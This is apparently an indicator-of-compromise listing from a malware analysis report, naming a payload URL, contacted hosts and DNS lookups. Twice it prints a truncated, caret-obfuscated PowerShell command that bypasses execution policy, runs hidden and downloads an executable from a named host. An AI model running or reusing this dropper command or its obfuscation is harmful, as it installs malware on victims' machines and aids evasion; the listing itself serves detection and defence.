Technical Information
- http://nexcontech.com/wp-content/ay4te/mdp5.exe as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^OW^ErS^hElL^.e^xE -Exe^cUTI^Onp^OliCY b^Y^P^as^S ^-NOp^R^oFI^LE ^-W^INDOWSTy^lE H^i^DDEn (^NEw^-o^b^j^E^ct^ SY^sTEM^.^Ne^T^.WE^bc^liE^nT^).dOWNLoa^d^fi^le^('http://nexcont...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "P^OW^ErS^hElL^.e^xE -Exe^cUTI^Onp^OliCY b^Y^P^as^S ^-NOp^R^oFI^LE ^-W^INDOWSTy^lE H^i^DDEn (^NEw^-o^b^j^E^ct^ SY^sTEM^.^Ne^T^.WE^bc^liE^nT^).dOWNLoa^d^fi^le^('http://nexcont...' (with hidden window)